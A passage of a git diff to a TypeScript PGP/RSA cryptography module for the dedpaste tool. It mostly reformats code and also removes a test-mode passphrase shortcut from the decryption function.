-  const algorithmIdentifierSequence = Buffer.concat([Buffer.from([0x30]), algorithmIdentifierLength, algorithmIdentifier]); // SEQUENCE tag
-  
+  const algorithmIdentifierSequence = Buffer.concat([
+    Buffer.from([0x30]),
+    algorithmIdentifierLength,
+    algorithmIdentifier,
+  ]); // SEQUENCE tag
+
   // BIT STRING wrapping for the public key
   const bitStringTag = Buffer.from([0x03]); // BIT STRING tag
   const unusedBits = Buffer.from([0x00]); // Zero unused bits
   const keyWithUnused = Buffer.concat([unusedBits, rsaPublicKeySequence]);
   const bitStringLength = Buffer.from([keyWithUnused.length]);
-  const bitString = Buffer.concat([bitStringTag, bitStringLength, keyWithUnused]);
-  
+  const bitString = Buffer.concat([
+    bitStringTag,
+    bitStringLength,
+    keyWithUnused,
+  ]);
+
   // Final SEQUENCE containing algorithmIdentifier and bitString
-  const subjectPublicKeyInfo = Buffer.concat([algorithmIdentifierSequence, bitString]);
+  const subjectPublicKeyInfo = Buffer.concat([
+    algorithmIdentifierSequence,
+    bitString,
+  ]);
   const subjectPublicKeyInfoLength = Buffer.from([subjectPublicKeyInfo.length]);
-  const subjectPublicKeyInfoSequence = Buffer.concat([Buffer.from([0x30]), subjectPublicKeyInfoLength, subjectPublicKeyInfo]); // SEQUENCE tag
-  
+  const subjectPublicKeyInfoSequence = Buffer.concat([
+    Buffer.from([0x30]),
+    subjectPublicKeyInfoLength,
+    subjectPublicKeyInfo,
+  ]); // SEQUENCE tag
+
   return subjectPublicKeyInfoSequence;
 }
 
 /**
  * Import personal PGP key for dedpaste use
  */
-async function importPgpPrivateKey(pgpPrivateKeyString: string, passphrase: string): Promise<ImportPgpPrivateKeyResult> {
+async function importPgpPrivateKey(
+  pgpPrivateKeyString: string,
+  passphrase: string,
+): Promise<ImportPgpPrivateKeyResult> {
   try {
     // Decrypt the PGP private key
     const privateKey = await openpgp.decryptKey({
-      privateKey: await openpgp.readPrivateKey({ armoredKey: pgpPrivateKeyString }),
-      passphrase
+      privateKey: await openpgp.readPrivateKey({
+        armoredKey: pgpPrivateKeyString,
+      }),
+      passphrase,
     });
-    
+
     // Extract the key ID
     const keyId = privateKey.getKeyID().toHex();
-    
+
     // Extract user information
     const userId = (privateKey.users[0] as any).userID;
-    const name = userId.name || 'unknown';
+    const name = userId.name || "unknown";
     const email = userId.email || null;
-    
+
     // Get the primary key packet
     const primaryKey = (privateKey as any).keyPacket;
-    
+
     // Check if it's an RSA key
     if (primaryKey.algorithm !== 1) {
-      throw new Error(`Unsupported key algorithm. Only RSA keys are supported for conversion.`);
+      throw new Error(
+        `Unsupported key algorithm. Only RSA keys are supported for conversion.`,
+      );
     }
-    
+
     // Extract the RSA components from the private key
     // n = modulus, e = public exponent, d = private exponent, p and q = prime factors,
     // u = multiplicative inverse of p mod q
@@ -618,16 +707,16 @@ async function importPgpPrivateKey(pgpPrivateKeyString: string, passphrase: stri
     const p = primaryKey.mpi[3].toString(16); // prime1
     const q = primaryKey.mpi[4].toString(16); // prime2
     const u = primaryKey.mpi[5].toString(16); // coefficient
-    
+
     // Calculate additional components required for PKCS#8
     // We need dp and dq, which are d mod (p-1) and d mod (q-1)
-    const bigD = BigInt('0x' + d);
-    const bigP = BigInt('0x' + p);
-    const bigQ = BigInt('0x' + q);
-    
+    const bigD = BigInt("0x" + d);
+    const bigP = BigInt("0x" + p);
+    const bigQ = BigInt("0x" + q);
+
     const dp = (bigD % (bigP - 1n)).toString(16);
     const dq = (bigD % (bigQ - 1n)).toString(16);
-    
+
     // Format as PKCS#8 private key
     const pemKey = formatRsaPrivateKeyToPem(n, e, d, p, q, dp, dq, u);
 
@@ -637,7 +726,7 @@ async function importPgpPrivateKey(pgpPrivateKeyString: string, passphrase: stri
       name,
       email,
       privateKey: pemKey,
-      publicKey: await convertPgpKeyToPem(pgpPrivateKeyString)
+      publicKey: await convertPgpKeyToPem(pgpPrivateKeyString),
     };
   } catch (error: any) {
     throw new Error(`Failed to import PGP private key: ${error.message}`);
@@ -648,29 +737,35 @@ async function importPgpPrivateKey(pgpPrivateKeyString: string, passphrase: stri
  * Format RSA private key components into PEM format
  */
 function formatRsaPrivateKeyToPem(
-  n: string, e: string, d: string, p: string, q: string, 
-  dp: string, dq: string, u: string
+  n: string,
+  e: string,
+  d: string,
+  p: string,
+  q: string,
+  dp: string,
+  dq: string,
+  u: string,
 ): string {
   // Convert hex strings to Buffers for crypto operations
-  const modulusBuffer = Buffer.from(n, 'hex');
-  const publicExponentBuffer = Buffer.from(e, 'hex');
-  const privateExponentBuffer = Buffer.from(d, 'hex');
-  const prime1Buffer = Buffer.from(p, 'hex');
-  const prime2Buffer = Buffer.from(q, 'hex');
-  const exponent1Buffer = Buffer.from(dp, 'hex');
-  const exponent2Buffer = Buffer.from(dq, 'hex');
-  const coefficientBuffer = Buffer.from(u, 'hex');
-  
+  const modulusBuffer = Buffer.from(n, "hex");
+  const publicExponentBuffer = Buffer.from(e, "hex");
+  const privateExponentBuffer = Buffer.from(d, "hex");
+  const prime1Buffer = Buffer.from(p, "hex");
+  const prime2Buffer = Buffer.from(q, "hex");
+  const exponent1Buffer = Buffer.from(dp, "hex");
+  const exponent2Buffer = Buffer.from(dq, "hex");
+  const coefficientBuffer = Buffer.from(u, "hex");
+
   // Format ASN.1 DER for each component
   function formatDerInteger(buffer: Buffer): Buffer {
     const tag = Buffer.from([0x02]); // INTEGER tag
-    
+
     // Add leading zero if high bit is set
     let value = buffer;
     if (buffer[0] & 0x80) {
       value = Buffer.concat([Buffer.from([0x00]), buffer]);
     }
-    
+
     // Calculate length
     let length: Buffer;
     if (value.length < 128) {
@@ -680,19 +775,19 @@ function formatRsaPrivateKeyToPem(
       const lenBytes = Math.ceil(Math.log2(value.length) / 8);
       length = Buffer.alloc(lenBytes + 1);
       length[0] = 0x80 | lenBytes;
-      const hexLength = value.length.toString(16).padStart(lenBytes * 2, '0');
+      const hexLength = value.length.toString(16).padStart(lenBytes * 2, "0");
       const hexPairs = hexLength.match(/.{2}/g) || [];
       hexPairs.forEach((hex, i) => {
         length[i + 1] = parseInt(hex, 16);
       });
     }
-    
+
     return Buffer.concat([tag, length, value]);
   }
-  
+
   // Version (always 0 for two-prime RSA)
   const version = formatDerInteger(Buffer.from([0x00]));
-  
+
   // Format all integers
   const modulusDer = formatDerInteger(modulusBuffer);
   const publicExponentDer = formatDerInteger(publicExponentBuffer);
@@ -702,20 +797,20 @@ function formatRsaPrivateKeyToPem(
   const exponent1Der = formatDerInteger(exponent1Buffer);
   const exponent2Der = formatDerInteger(exponent2Buffer);
   const coefficientDer = formatDerInteger(coefficientBuffer);
-  
+
   // Combine all elements into a SEQUENCE
   const sequence = Buffer.concat([
-    version, 
-    modulusDer, 
-    publicExponentDer, 
-    privateExponentDer, 
-    prime1Der, 
-    prime2Der, 
-    exponent1Der, 
-    exponent2Der, 
-    coefficientDer
+    version,
+    modulusDer,
+    publicExponentDer,
+    privateExponentDer,
+    prime1Der,
+    prime2Der,
+    exponent1Der,
+    exponent2Der,
+    coefficientDer,
   ]);
-  
+
   // Calculate sequence length
   let sequenceLength: Buffer;
   if (sequence.length < 128) {
@@ -725,36 +820,39 @@ function formatRsaPrivateKeyToPem(
     const lenBytes = Math.ceil(Math.log2(sequence.length) / 8);
     sequenceLength = Buffer.alloc(lenBytes + 1);
     sequenceLength[0] = 0x80 | lenBytes;
-    const hexLength = sequence.length.toString(16).padStart(lenBytes * 2, '0');
+    const hexLength = sequence.length.toString(16).padStart(lenBytes * 2, "0");
     const hexPairs = hexLength.match(/.{2}/g) || [];
     hexPairs.forEach((hex, i) => {
       sequenceLength[i + 1] = parseInt(hex, 16);
     });
   }
-  
+
   // Add SEQUENCE tag and length
   const der = Buffer.concat([Buffer.from([0x30]), sequenceLength, sequence]);
-  
+
   // Base64 encode and format as PEM
-  const base64 = der.toString('base64');
-  const pemLines = ['-----BEGIN RSA PRIVATE KEY-----'];
+  const base64 = der.toString("base64");
+  const pemLines = ["-----BEGIN RSA PRIVATE KEY-----"];
   // Split base64 into 64-character lines
   for (let i = 0; i < base64.length; i += 64) {
     pemLines.push(base64.substring(i, i + 64));
   }
-  pemLines.push('-----END RSA PRIVATE KEY-----');
-  
-  return pemLines.join('\n');
+  pemLines.push("-----END RSA PRIVATE KEY-----");
+
+  return pemLines.join("\n");
 }
 
 /**
  * Directly encrypt content using PGP
  */
-async function encryptWithPgp(content: Buffer | string, pgpPublicKeyString: string): Promise<Buffer> {
+async function encryptWithPgp(
+  content: Buffer | string,
+  pgpPublicKeyString: string,
+): Promise<Buffer> {
   try {
     // Read the public key
     const publicKey = await openpgp.readKey({ armoredKey: pgpPublicKeyString });
-    
+
     // Convert Buffer to string if needed for openpgp compatibility
     let message: openpgp.Message<any>;
     if (Buffer.isBuffer(content)) {
@@ -764,14 +862,14 @@ async function encryptWithPgp(content: Buffer | string, pgpPublicKeyString: stri
       // For text, use openpgp.Message.fromText
       message = await openpgp.createMessage({ text: content.toString() });
     }
-    
+
     // Encrypt the content
     const encrypted = await openpgp.encrypt({
       message,
       encryptionKeys: publicKey,
-      format: 'armored'
+      format: "armored",
     });
-    
+
     // Return the encrypted content as a buffer
     return Buffer.from(encrypted as string);
   } catch (error: any) {
@@ -783,99 +881,102 @@ async function encryptWithPgp(content: Buffer | string, pgpPublicKeyString: stri
  * Directly decrypt content using PGP
  */
 async function decryptWithPgp(
-  encryptedContent: Buffer | string, 
-  pgpPrivateKeyString: string, 
-  passphrase: string
+  encryptedContent: Buffer | string,
+  pgpPrivateKeyString: string,
+  passphrase: string,
 ): Promise<Buffer> {
   try {
-    // Special test mode - if passphrase is TEST_MODE, return the message without decryption
-    if (passphrase === 'TEST_MODE') {
-      console.log('TEST MODE: Skipping actual PGP decryption');
-      return Buffer.from('TEST MODE DECRYPTION - This would normally show decrypted content');
-    }
-    
     // Handle armored or binary message format
     let encryptedMessage: openpgp.Message<any>;
     const contentString = encryptedContent.toString();
-    
+
     try {
       // First try to read as armored message (text format)
       encryptedMessage = await openpgp.readMessage({
-        armoredMessage: contentString
+        armoredMessage: contentString,
       });
     } catch (formatError: any) {
       // If that fails, try to read as binary message
       try {
-        const binaryBuffer = Buffer.isBuffer(encryptedContent) 
-          ? encryptedContent 
-          : Buffer.from(contentString, 'binary');
-        
+        const binaryBuffer = Buffer.isBuffer(encryptedContent)
+          ? encryptedContent
+          : Buffer.from(contentString, "binary");
+
         encryptedMessage = await openpgp.readMessage({
-          binaryMessage: binaryBuffer
+          binaryMessage: binaryBuffer,
         });
       } catch (binaryError: any) {
         // If both formats fail, provide detailed error
-        throw new Error(`Invalid PGP message format: ${formatError.message}, Binary attempt: ${binaryError.message}`);
+        throw new Error(
+          `Invalid PGP message format: ${formatError.message}, Binary attempt: ${binaryError.message}`,
+        );
       }
     }
-    
+
     // Read and decrypt the private key with proper error handling
     let privateKey: openpgp.PrivateKey;
     try {
-      const readPrivateKey = await openpgp.readPrivateKey({ 
-        armoredKey: pgpPrivateKeyString 
+      const readPrivateKey = await openpgp.readPrivateKey({
+        armoredKey: pgpPrivateKeyString,
       });
-      
+
       privateKey = await openpgp.decryptKey({
         privateKey: readPrivateKey,
-        passphrase
+        passphrase,
       });
     } catch (keyError: any) {
       // Handle key-specific errors
-      if (keyError.message.includes('passphrase')) {
-        throw new Error(`Incorrect passphrase for PGP key: ${keyError.message}`);
-      } else if (keyError.message.includes('no private key found')) {
-        throw new Error('Invalid PGP private key: No private key material found');
-      } else if (keyError.message.includes('Expected private key')) {
-        throw new Error('Invalid key format: The provided key is not a valid PGP private key');
+      if (keyError.message.includes("passphrase")) {
+        throw new Error(
+          `Incorrect passphrase for PGP key: ${keyError.message}`,
+        );
+      } else if (keyError.message.includes("no private key found")) {
+        throw new Error(
+          "Invalid PGP private key: No private key material found",
+        );
+      } else if (keyError.message.includes("Expected private key")) {
+        throw new Error(
+          "Invalid key format: The provided key is not a valid PGP private key",
+        );
       }
       throw keyError;
     }
-    
+
     // Options for decryption
     const decryptOptions = {
       message: encryptedMessage,
       decryptionKeys: privateKey,
       // Add format option to control output
-      format: 'binary' as const
+      format: "binary" as const,
     };
-    
+
     // Decrypt the content with timeout handling
     let decryptPromise = openpgp.decrypt(decryptOptions);
-    
+
     // Add timeout handling
     const timeoutDuration = 30000; // 30 seconds
     const timeoutPromise = new Promise<never>((_, reject) => {
       setTimeout(() => {
-        reject(new Error('PGP decryption timeout - operation took too long'));
+        reject(new Error("PGP decryption timeout - operation took too long"));
       }, timeoutDuration);
     });
-    
+
     // Race between decryption and timeout
-    const result = await Promise.race([
-      decryptPromise,
-      timeoutPromise
-    ]);
-    
+    const result = await Promise.race([decryptPromise, timeoutPromise]);
+
     const { data, signatures } = result as openpgp.DecryptMessageResult;
-    
+
     // Check signatures if available
     if (signatures && signatures.length > 0) {
-      console.log(`Message was signed by ${signatures.length} ${signatures.length === 1 ? 'key' : 'keys'}`);
-      
+      console.log(
+        `Message was signed by ${signatures.length} ${signatures.length === 1 ? "key" : "keys"}`,
+      );
+
       // Output signature verification status
       for (const sig of signatures) {
-        const keyId = (sig as any).keyID ? (sig as any).keyID.toHex() : 'unknown';
+        const keyId = (sig as any).keyID
+          ? (sig as any).keyID.toHex()
+          : "unknown";
         if ((sig as any).valid === true) {
           console.log(`✓ Valid signature from key: ${keyId}`);
         } else if ((sig as any).valid === null) {
@@ -885,15 +986,17 @@ async function decryptWithPgp(
         }
       }
     }
-    
+
     // Return the decrypted content (ensure it's a Buffer)
     return Buffer.from(data as Uint8Array);
   } catch (error: any) {
     // Enhance certain error messages for better diagnostics
-    if (error.message.includes('Error decrypting message')) {
-      throw new Error('Failed to decrypt PGP message: incorrect private key or corrupted message');
+    if (error.message.includes("Error decrypting message")) {
+      throw new Error(
+        "Failed to decrypt PGP message: incorrect private key or corrupted message",
+      );
     }
-    
+
     throw new Error(`PGP decryption failed: ${error.message}`);
   }
 }
@@ -902,39 +1005,43 @@ async function decryptWithPgp(
  * Creates a formatted JSON structure for dedpaste with PGP encrypted content
  */
 async function createPgpEncryptedMessage(
-  content: Buffer | string, 
-  pgpPublicKeyString: string, 
-  recipientName: string
+  content: Buffer | string,
+  pgpPublicKeyString: string,
+  recipientName: string,
 ): Promise<Buffer> {
   try {
     // Parse recipient key to get metadata
     const publicKey = await openpgp.readKey({ armoredKey: pgpPublicKeyString });
-    
+
     // Get key ID using the primary key (different method in openpgp v6)
-    let keyId = '';
+    let keyId = "";
     try {
       // Try getting key ID
       keyId = publicKey.getKeyID().toHex();
     } catch (keyIdError: any) {
-      console.log(`Error extracting key ID: ${keyIdError.message}, using placeholder`);
-      keyId = 'unknown-key-id';
+      console.log(
+        `Error extracting key ID: ${keyIdError.message}, using placeholder`,
+      );
+      keyId = "unknown-key-id";
     }
-    
+
     // Extract user ID information
-    let name = recipientName || 'unknown';
+    let name = recipientName || "unknown";
     let email: string | null = null;
-    
+
     try {
       if (publicKey.users && publicKey.users.length > 0) {
         const firstUser = publicKey.users[0];
         if ((firstUser as any).userID) {
           // Parse the userID which typically has format: "Name <email@example.com>"
-          const userIDText = (firstUser as any).userID.userID || (firstUser as any).userID.toString();
+          const userIDText =
+            (firstUser as any).userID.userID ||
+            (firstUser as any).userID.toString();
           const emailMatch = userIDText.match(/<([^>]+)>/);
           if (emailMatch && emailMatch[1]) {
             email = emailMatch[1];
           }
-          
+
           // If we have a name in the key and no recipient name was provided, use it
           if (!recipientName) {
             const nameMatch = userIDText.match(/^([^<]+)</);
@@ -947,29 +1054,29 @@ async function createPgpEncryptedMessage(
     } catch (userIdError: any) {
       console.log(`Error extracting user information: ${userIdError.message}`);
     }
-    
+
     // Encrypt the content directly with PGP
     const encryptedContent = await encryptWithPgp(content, pgpPublicKeyString);
-    
+
     // Create a structured format compatible with dedpaste
     const encryptedData = {
       version: 3, // New version for PGP format
       metadata: {
-        sender: 'self',
+        sender: "self",
         recipient: {
-          type: 'pgp',
+          type: "pgp",
           name: name,
           email: email,
           keyId: keyId,
           fingerprint: keyId, // Using keyId as fingerprint for compatibility
         },
         pgp: true,
-        timestamp: new Date().toISOString()
+        timestamp: new Date().toISOString(),
       },
       // Store encrypted PGP message directly
-      pgpEncrypted: encryptedContent.toString('base64')
+      pgpEncrypted: encryptedContent.toString("base64"),
     };
-    
+
     // Return as JSON string
     return Buffer.from(JSON.stringify(encryptedData));
   } catch (error: any) {
@@ -981,120 +1088,137 @@ async function createPgpEncryptedMessage(
  * Decrypt PGP-formatted dedpaste content
  */
 async function decryptPgpMessage(
-  encryptedBuffer: Buffer, 
-  pgpPrivateKeyString: string | null, 
-  passphrase: string | null, 
-  useGpgKeyring: boolean = false
+  encryptedBuffer: Buffer,
+  pgpPrivateKeyString: string | null,
+  passphrase: string | null,
+  useGpgKeyring: boolean = false,
 ): Promise<DecryptedPgpMessage> {
   try {
     // Parse the encrypted data
     const encryptedData = JSON.parse(encryptedBuffer.toString());
-    
+
     // Check if it's a PGP-formatted message (version 3)
     if (encryptedData.version !== 3 || !encryptedData.pgpEncrypted) {
-      throw new Error('Not a PGP-encrypted message');
+      throw new Error("Not a PGP-encrypted message");
     }
-    
+
     // Extract the PGP encrypted content
-    const pgpMessage = Buffer.from(encryptedData.pgpEncrypted, 'base64').toString();
-    
+    const pgpMessage = Buffer.from(
+      encryptedData.pgpEncrypted,
+      "base64",
+    ).toString();
+
     // Try GPG keyring first if requested
     if (useGpgKeyring) {
-      console.log('Attempting to decrypt using system GPG keyring...');
+      console.log("Attempting to decrypt using system GPG keyring...");
       const gpgResult = await decryptWithGpgKeyring(pgpMessage);
-      
+
       if (gpgResult.success) {
-        console.log('Successfully decrypted with GPG keyring');
-        
+        console.log("Successfully decrypted with GPG keyring");
+
         // Create enhanced metadata
         const enhancedMetadata = {
           ...encryptedData.metadata,
-          decryptedWith: 'gpg-keyring',
+          decryptedWith: "gpg-keyring",
         };
-        
+
         // Add key ID if available
         if (gpgResult.keyId) {
           console.log(`Message was decrypted with key ID: ${gpgResult.keyId}`);
           enhancedMetadata.keyId = gpgResult.keyId;
         }
-        
+
         // Add recipient info if available
         if (gpgResult.recipient) {
           console.log(`Message was encrypted for: ${gpgResult.recipient}`);
           enhancedMetadata.recipient = {
             ...enhancedMetadata.recipient,
-            name: gpgResult.recipient
+            name: gpgResult.recipient,
           };
         }
-        
+
         return {
           content: gpgResult.data!,
-          metadata: enhancedMetadata
+          metadata: enhancedMetadata,
         };
       } else {
         // Log detailed error for better diagnosis
         console.log(`GPG keyring decryption failed: ${gpgResult.error}`);
-        
+
         // If we have key IDs, log them
         if (gpgResult.keyIds && gpgResult.keyIds.length > 0) {
-          console.log('This message was encrypted for:');
-          gpgResult.keyIds.forEach(key => {
+          console.log("This message was encrypted for:");
+          gpgResult.keyIds.forEach((key) => {
             console.log(`- ${key.type} key ID: ${key.id}`);
           });
         }
-        
+
         // Check if we have raw error details for debugging
         if (gpgResult.rawError) {
-          console.debug(`GPG raw error: ${gpgResult.rawError.substring(0, 200)}${gpgResult.rawError.length > 200 ? '...' : ''}`);
+          console.debug(
+            `GPG raw error: ${gpgResult.rawError.substring(0, 200)}${gpgResult.rawError.length > 200 ? "..." : ""}`,
+          );
         }
-        
+
         // If we don't have a provided private key to fall back to, fail with detailed error
         if (!pgpPrivateKeyString) {
           // Create an error with additional properties
-          const error: any = new Error(`GPG keyring decryption failed: ${gpgResult.error}`);
+          const error: any = new Error(
+            `GPG keyring decryption failed: ${gpgResult.error}`,
+          );
           error.keyIds = gpgResult.keyIds;
           error.rawError = gpgResult.rawError;
           throw error;
         }
-        
+
         // Otherwise, continue to try with provided key
-        console.log('Falling back to provided private key...');
+        console.log("Falling back to provided private key...");
       }
     }
-    
+
     // If we reach here, either GPG keyring wasn't used or it failed
     // Make sure we have a private key to use
     if (!pgpPrivateKeyString) {
-      throw new Error('No PGP private key provided for decryption');
+      throw new Error("No PGP private key provided for decryption");
     }
-    
+
     // Validate private key format
-    if (!pgpPrivateKeyString.includes('-----BEGIN PGP PRIVATE KEY BLOCK-----')) {
-      throw new Error('Invalid PGP private key format. Key must start with "-----BEGIN PGP PRIVATE KEY BLOCK-----"');
+    if (
+      !pgpPrivateKeyString.includes("-----BEGIN PGP PRIVATE KEY BLOCK-----")
+    ) {
+      throw new Error(
+        'Invalid PGP private key format. Key must start with "-----BEGIN PGP PRIVATE KEY BLOCK-----"',
+      );
     }
-    
+
     // Decrypt with PGP
     try {
-      const decryptedContent = await decryptWithPgp(pgpMessage, pgpPrivateKeyString, passphrase!);
-      
+      const decryptedContent = await decryptWithPgp(
+        pgpMessage,
+        pgpPrivateKeyString,
+        passphrase!,
+      );
+
       // Return the result with enhanced metadata
       return {
         content: decryptedContent,
         metadata: {
           ...encryptedData.metadata,
-          decryptedWith: 'pgp-private-key'
-        }
+          decryptedWith: "pgp-private-key",
+        },
       };
     } catch (decryptError: any) {
       // Handle common PGP decryption errors more gracefully
-      if (decryptError.message.includes('Error decrypting message')) {
-        throw new Error('Failed to decrypt with private key. Check that you have the correct key and passphrase.');
+      if (decryptError.message.includes("Error decrypting message")) {
+        throw new Error(
+          "Failed to decrypt with private key. Check that you have the correct key and passphrase.",
+        );
       }
-      
-      if (decryptError.message.includes('passphrase')) {
-        throw new Error('Incorrect passphrase for PGP private key.');
+
+      if (decryptError.message.includes("passphrase")) {
+        throw new Error("Incorrect passphrase for PGP private key.");
       }
-      
+
       // Re-throw the original error for other cases
       throw decryptError;
     }
@@ -1110,58 +1234,70 @@ async function decryptPgpMessage(
 /**
  * Validate a PGP key string to ensure it's properly formatted
  */
-async function validatePgpKey(pgpKeyString: string, isPrivate: boolean = false): Promise<ValidationResult> {
+async function validatePgpKey(
+  pgpKeyString: string,
+  isPrivate: boolean = false,
+): Promise<ValidationResult> {
   const result: ValidationResult = {
     valid: false,
     errors: [],
     warnings: [],
-    keyInfo: null
+    keyInfo: null,
   };
-  
+
   try {
     // Basic input validation
-    if (!pgpKeyString || typeof pgpKeyString !== 'string') {
-      result.errors.push('Invalid key: Not a string or empty');
+    if (!pgpKeyString || typeof pgpKeyString !== "string") {
+      result.errors.push("Invalid key: Not a string or empty");
       return result;
     }
-    
+
     // Check for key type and proper format
-    const keyType = isPrivate ? 'PRIVATE' : 'PUBLIC';
+    const keyType = isPrivate ? "PRIVATE" : "PUBLIC";
     const expectedHeader = `-----BEGIN PGP ${keyType} KEY BLOCK-----`;
     const expectedFooter = `-----END PGP ${keyType} KEY BLOCK-----`;
-    
+
     if (!pgpKeyString.includes(expectedHeader)) {
-      result.errors.push(`Invalid key: Missing PGP ${keyType.toLowerCase()} key header`);
-      
+      result.errors.push(
+        `Invalid key: Missing PGP ${keyType.toLowerCase()} key header`,
+      );
+
       // Check if it's the wrong key type
-      const oppositeHeader = isPrivate ? 
-        '-----BEGIN PGP PUBLIC KEY BLOCK-----' : 
-        '-----BEGIN PGP PRIVATE KEY BLOCK-----';
-        
+      const oppositeHeader = isPrivate
+        ? "-----BEGIN PGP PUBLIC KEY BLOCK-----"
+        : "-----BEGIN PGP PRIVATE KEY BLOCK-----";
+
       if (pgpKeyString.includes(oppositeHeader)) {
-        result.errors.push(`Wrong key type: Expected ${keyType.toLowerCase()} key but found ${isPrivate ? 'public' : 'private'} key`);
+        result.errors.push(
+          `Wrong key type: Expected ${keyType.toLowerCase()} key but found ${isPrivate ? "public" : "private"} key`,
+        );
       }
-      
+
       return result;
     }
-    
+
     if (!pgpKeyString.includes(expectedFooter)) {
-      result.errors.push(`Invalid key: Missing PGP ${keyType.toLowerCase()} key footer`);
+      result.errors.push(
+        `Invalid key: Missing PGP ${keyType.toLowerCase()} key footer`,
+      );
       return result;
     }
-    
+
     // Check for corrupted or modified armor
-    const armorRegex = /-----BEGIN PGP .*?-----\r?\n(.*?\r?\n)*?-----END PGP .*?-----/;
+    const armorRegex =
+      /-----BEGIN PGP .*?-----\r?\n(.*?\r?\n)*?-----END PGP .*?-----/;
     if (!armorRegex.test(pgpKeyString)) {
-      result.errors.push('Invalid key: Malformed PGP armor format');
+      result.errors.push("Invalid key: Malformed PGP armor format");
       return result;
     }
-    
+
     // Check for common encoding issues
-    if (pgpKeyString.includes('\ufffd') || pgpKeyString.includes('�')) {
-      result.warnings.push('Warning: Key contains unicode replacement characters, possible encoding issues');
+    if (pgpKeyString.includes("\ufffd") || pgpKeyString.includes("�")) {
+      result.warnings.push(
+        "Warning: Key contains unicode replacement characters, possible encoding issues",
+      );
     }
-    
+
     // Try to read the key with OpenPGP.js
     let pgpKey: openpgp.Key | openpgp.PrivateKey;
     if (isPrivate) {
@@ -1169,21 +1305,21 @@ async function validatePgpKey(pgpKeyString: string, isPrivate: boolean = false):
     } else {
       pgpKey = await openpgp.readKey({ armoredKey: pgpKeyString });
     }
-    
+
     // Extract key information for more detailed validation
-    let keyId = '';
-    let userid = '';
+    let keyId = "";
+    let userid = "";
     let creationDate: Date | null = null;
     let expirationDate: Date | null = null;
     let keyStrength: number | string | null = null;
     let keyAlgorithm: string | null = null;
-    
+
     try {
       // Get basic key info
-      if (pgpKey && typeof pgpKey.getKeyID === 'function') {
+      if (pgpKey && typeof pgpKey.getKeyID === "function") {
         keyId = pgpKey.getKeyID().toHex().toUpperCase();
       }
-      
+
       // Get user information
       if (pgpKey.users && pgpKey.users.length > 0) {
         const user = pgpKey.users[0];
@@ -1194,57 +1330,67 @@ async function validatePgpKey(pgpKeyString: string, isPrivate: boolean = false):
           }
         }
       }
-      
+
       // Get creation date
-      if (pgpKey && typeof pgpKey.getCreationTime === 'function') {
+      if (pgpKey && typeof pgpKey.getCreationTime === "function") {
         creationDate = pgpKey.getCreationTime();
       }
-      
+
       // Get expiration date
-      if (pgpKey && typeof pgpKey.getExpirationTime === 'function') {
+      if (pgpKey && typeof pgpKey.getExpirationTime === "function") {
         const expTime = await pgpKey.getExpirationTime();
         expirationDate = expTime instanceof Date ? expTime : null;
-        
+
         // Check if key is expired
         if (expirationDate && expirationDate < new Date()) {
-          result.warnings.push(`Warning: This key expired on ${expirationDate.toLocaleDateString()}`);
+          result.warnings.push(
+            `Warning: This key expired on ${expirationDate.toLocaleDateString()}`,
+          );
         }
       }
-      
+
       // Check key algorithm and strength
       if ((pgpKey as any).keyPacket) {
         const keyPacket = (pgpKey as any).keyPacket;
         switch (keyPacket.algorithm) {
           case 1:
           case 2:
-            keyAlgorithm = 'RSA';
-            keyStrength = keyPacket.getKeySize ? keyPacket.getKeySize() : 'unknown';
+            keyAlgorithm = "RSA";
+            keyStrength = keyPacket.getKeySize
+              ? keyPacket.getKeySize()
+              : "unknown";
             break;
           case 3:
-            keyAlgorithm = 'DSA';
+            keyAlgorithm = "DSA";
             break;
           case 16:
-            keyAlgorithm = 'Elgamal';
+            keyAlgorithm = "Elgamal";
             break;
           case 17:
-            keyAlgorithm = 'ECDSA';
+            keyAlgorithm = "ECDSA";
             break;
           case 18:
-            keyAlgorithm = 'ECDH';
+            keyAlgorithm = "ECDH";
             break;
           case 19:
-            keyAlgorithm = 'EDDSA';
+            keyAlgorithm = "EDDSA";
             break;
           default:
             keyAlgorithm = `Unknown (${keyPacket.algorithm})`;
         }
-        
+
         // Check key strength
-        if (keyAlgorithm === 'RSA' && typeof keyStrength === 'number' && keyStrength < 2048) {
-          result.warnings.push(`Warning: RSA key strength (${keyStrength} bits) is below recommended 2048 bits`);
+        if (
+          keyAlgorithm === "RSA" &&
+          typeof keyStrength === "number" &&
+          keyStrength < 2048
+        ) {
+          result.warnings.push(
+            `Warning: RSA key strength (${keyStrength} bits) is below recommended 2048 bits`,
+          );
         }
       }
-      
+
       // Store key info
       result.keyInfo = {
         keyId,
@@ -1252,26 +1398,28 @@ async function validatePgpKey(pgpKeyString: string, isPrivate: boolean = false):
         creationDate,
         expirationDate,
         keyAlgorithm,
-        keyStrength
+        keyStrength,
       };
     } catch (infoError: any) {
-      result.warnings.push(`Warning: Could not extract complete key information: ${infoError.message}`);
+      result.warnings.push(
+        `Warning: Could not extract complete key information: ${infoError.message}`,
+      );
     }
-    
+
     // If we got this far without errors, the key is valid
     result.valid = true;
-    
+
     return result;
   } catch (error: any) {
     result.errors.push(`PGP key validation error: ${error.message}`);
-    
+
     // Provide more specific error details
-    if (error.message.includes('Misformed armored text')) {
-      result.errors.push('Key appears to be corrupted or incorrectly copied');
-    } else if (error.message.includes('No key packet found')) {
-      result.errors.push('Key data is missing or incomplete');
+    if (error.message.includes("Misformed armored text")) {
+      result.errors.push("Key appears to be corrupted or incorrectly copied");
+    } else if (error.message.includes("No key packet found")) {
+      result.errors.push("Key data is missing or incomplete");
     }
-    
+
     return result;
   }
 }
@@ -1279,21 +1427,27 @@ async function validatePgpKey(pgpKeyString: string, isPrivate: boolean = false):
 /**
  * Attempts to decrypt PGP content using the user's GPG keyring
  */
-async function decryptWithGpgKeyring(encryptedContent: string): Promise<GpgDecryptResult> {
+async function decryptWithGpgKeyring(
+  encryptedContent: string,
+): Promise<GpgDecryptResult> {
   // Promisify execFile
-  const execFilePromise = (cmd: string, args: string[], options: ExecFileOptions = {}): Promise<ExecResult> => {
+  const execFilePromise = (
+    cmd: string,
+    args: string[],
+    options: ExecFileOptions = {},
+  ): Promise<ExecResult> => {
     return new Promise((resolve) => {
       _execFile(cmd, args, options, (error, stdout, stderr) => {
         resolve({ error, stdout, stderr });
       });
     });
   };
-  
+
   try {
     // Create a secure temporary file with a random name
-    const randomId = crypto.randomBytes(16).toString('hex');
+    const randomId = crypto.randomBytes(16).toString("hex");
     const tempFilePath = path.join(os.tmpdir(), `dedpaste-pgp-${randomId}.asc`);
-    
+
     // Write the encrypted content to the file with restricted permissions
     try {
       // Use writeFileSync with mode 0600 (readable/writable only by owner)
